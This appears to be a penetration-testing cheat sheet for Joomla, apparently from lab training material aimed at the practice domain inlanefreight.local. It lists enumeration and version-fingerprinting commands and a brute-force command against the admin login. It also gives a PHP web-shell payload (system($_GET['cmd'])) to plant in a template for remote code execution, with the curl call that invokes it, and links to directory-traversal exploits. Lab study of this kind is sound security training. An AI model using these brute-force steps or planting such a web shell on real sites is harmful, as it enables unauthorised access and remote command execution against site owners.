Joomla

Introduction

CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more.
Written in PHP and uses MySQL in the backend.

Command Description

Command	Description
`droopescan scan joomla --url http://dev.inlanefreight.local`	Enumeration via `droopescan`
`python2.7 joomlascan.py -u http://dev.inlanefreight.local`	Enumeration via `joomlascan.py`
`curl -s http://dev.inlanefreight.local/ \| grep Joomla`	Check Webpage Source
`curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml \| xmllint --format -`	Some Joomla versions may be fingerprinted from this file
Browse to `http://dev.inlanefreight.local/plugins/system/cache/cache.xml`	The `cache.xml` file can give out an `approximate version` of Joomla
Browse to `http://dev.inlanefreight.local/media/system/js/`	Some versions of Joomla can be fingerprinted by analyzing the javascript files in this folder
Browse to `http://blog.inlanefreight.local/robots.txt`	Check for references to Joomla
Browse to `http://dev.inlanefreight.local/README.txt`	Check the README file to look for references to Joomla

droopescan scan joomla --url http://dev.inlanefreight.local

Enumeration via droopescan

python2.7 joomlascan.py -u http://dev.inlanefreight.local

Enumeration via joomlascan.py

curl -s http://dev.inlanefreight.local/ | grep Joomla

Check Webpage Source

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

Some Joomla versions may be fingerprinted from this file

Browse to http://dev.inlanefreight.local/plugins/system/cache/cache.xml

The cache.xml file can give out an approximate version of Joomla

Browse to http://dev.inlanefreight.local/media/system/js/

Some versions of Joomla can be fingerprinted by analyzing the javascript files in this folder

Browse to http://blog.inlanefreight.local/robots.txt

Check for references to Joomla

Browse to http://dev.inlanefreight.local/README.txt

Check the README file to look for references to Joomla

Administrator account: The default administrator account is admin, but the password is set at install time
You can perform login broteforce by using the following: https://github.com/ajnik/joomla-bruteforce
PoC: sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

PHP TEMPLATE CODE INJECTION TO RCE [Requires Admin Account]
- The basic idea is to add PHP code inside a template
- Login as Admin → Navigate to Configuration → Select a Template → Select an existing PHP file → add the following payload:
- system($_GET['cmd']);
- curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id
Joomla 3.9.4 directory traversal CVE-2019-10945
- Exploit 1: https://www.exploit-db.com/exploits/46710
- Exploit 2: https://github.com/dpgg101/CVE-2019-10945

Last updated 5 months ago